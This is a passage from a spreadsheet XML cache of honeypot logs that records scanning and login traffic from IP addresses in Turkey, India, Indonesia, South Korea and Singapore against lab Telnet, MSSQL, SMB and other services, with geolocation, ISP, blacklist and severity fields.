    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:40b9:6ebe"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1134"/>
    <x v="1134"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T17:02:02"/>
    <d v="2025-04-22T17:02:02"/>
    <d v="2025-04-22T17:02:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Pendik"/>
    <s v="740616"/>
    <s v="NA"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b05a:5118"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1135"/>
    <x v="1135"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T16:56:49"/>
    <d v="2025-04-22T16:54:21"/>
    <d v="2025-04-22T16:56:49"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.209"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="business"/>
    <s v="Bharti Airtel"/>
    <s v="2010-02-17"/>
    <s v="BHARTI-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b64a:76b2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1136"/>
    <x v="1136"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T16:53:58"/>
    <d v="2023-08-23T09:12:18"/>
    <d v="2025-04-22T16:53:58"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="6379&amp;&amp;29808&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="SU"/>
    <s v="North Sumatra"/>
    <s v="Kota Tanjung Balai"/>
    <s v="Tanjungbalai"/>
    <s v="1213547"/>
    <s v="NA"/>
    <s v="2.83506"/>
    <s v="99.8795"/>
    <s v="150490"/>
    <s v="PT General Media Network"/>
    <s v="PT General Media Network"/>
    <s v="business"/>
    <s v="PT General Media Network"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6737:1616"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1137"/>
    <x v="1137"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T16:53:17"/>
    <d v="2024-11-30T16:17:48"/>
    <d v="2025-04-22T16:53:17"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H29"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Hooghly"/>
    <s v="Konnagar"/>
    <s v="1266179"/>
    <s v="NA"/>
    <s v="22.7051"/>
    <s v="88.3445"/>
    <s v="23860"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="ALLIANCEBROADBAND"/>
    <s v="residential"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (116.193.129.247,57232)}&amp;&amp;{Data_SMB:Incoming connection (116.193.129.247,57865)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:74c1:81f7"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1138"/>
    <x v="1138"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T16:51:49"/>
    <d v="2023-07-24T18:49:43"/>
    <d v="2025-04-22T16:51:49"/>
    <n v="2929"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IPP_H2&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_DNS_H40&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;631&amp;&amp;143&amp;&amp;443&amp;&amp;1521&amp;&amp;5900&amp;&amp;53&amp;&amp;445&amp;&amp;7247&amp;&amp;23&amp;&amp;9100&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="64"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc47:bbab"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1139"/>
    <x v="1139"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T16:41:03"/>
    <d v="2025-04-22T16:41:03"/>
    <d v="2025-04-22T16:41:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="35"/>
    <s v="İzmir Province"/>
    <s v="Karşıyaka İlçesi"/>
    <s v="Cordaleo"/>
    <s v="308988"/>
    <s v="35580"/>
    <s v="38.5032"/>
    <s v="27.1259"/>
    <s v="47331"/>
    <s v="TTNET"/>
    <s v="TurkTelecom"/>
    <s v="consumer"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:58f3:2794"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1140"/>
    <x v="1140"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T16:40:17"/>
    <d v="2025-02-15T12:28:14"/>
    <d v="2025-04-22T16:40:17"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata"/>
    <s v="1275004"/>
    <s v="700052"/>
    <s v="22.5726"/>
    <s v="88.3639"/>
    <s v="45804"/>
    <s v="Meghbela Cable &amp; Broadband Services (P) Ltd"/>
    <s v="Meghbela Cable &amp; Broadband Services (P) Ltd"/>
    <s v="business"/>
    <s v="Infiniti Television And Telecom Private Limited"/>
    <s v="2016-09-28"/>
    <s v="INFITEL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.76.80.53,52581)}&amp;&amp;{Data_SMB:Incoming connection (103.76.80.53,53123)}&amp;&amp;{Data_SMB:Incoming connection (103.76.80.53,55515)}&amp;&amp;{Data_SMB:Incoming connection (103.76.80.53,55899)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:674c:5035"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1141"/>
    <x v="1141"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T16:24:50"/>
    <d v="2024-04-12T11:29:00"/>
    <d v="2025-04-22T16:24:50"/>
    <n v="240"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H4"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;42225&amp;&amp;8539&amp;&amp;80&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="64"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="29"/>
    <s v="Gwangju"/>
    <s v="Seo-gu"/>
    <s v="Nongseong-dong"/>
    <s v="8691507"/>
    <s v="502-200"/>
    <s v="35.1542"/>
    <s v="126.888"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Jeonnambonbujang"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79b3:96e7"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1142"/>
    <x v="1142"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T16:22:48"/>
    <d v="2025-02-10T09:53:57"/>
    <d v="2025-04-22T16:22:48"/>
    <n v="84"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="National Internet Backbone"/>
    <s v="2000-01-11"/>
    <s v="BSNLNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_SMB:Incoming connection (61.0.227.133,56014)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,56067)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57001)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,53810)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58390)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58403)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,59361)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,62023)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,63009)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58996)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,59024)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,60030)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,49990)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50075)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50992)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,62791)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,62796)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,63575)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57631)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57664)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58593)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57356)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57469)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50744)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50816)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,51782)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,51811)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,51815)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,52632)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,55716)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,55783)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,56895)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,61037)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,61140)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,61828)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,64382)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,64508)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,65524)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50221)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50284)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,51526)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57811)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57856)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58786)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,49495)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,49530)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50275)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57815)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57818)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58506)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d00:e385"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1143"/>
    <x v="1143"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T15:10:47"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-22T15:10:47"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H29&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="53&amp;&amp;32928&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Queenstown Estate)"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.29229"/>
    <s v="103.808"/>
    <s v="9506"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="residential"/>
    <s v="Singtel Fibre"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4ff:606a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1144"/>
    <x v="1144"/>
    <s v="NA&amp;&amp;ool-2f123edd.dyn.optonline.net"/>
    <x v="0"/>
    <d v="2025-04-22T14:59:38"/>
    <d v="2024-12-14T07:33:18"/>
    <d v="2025-04-22T14:59:38"/>
    <n v="147"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
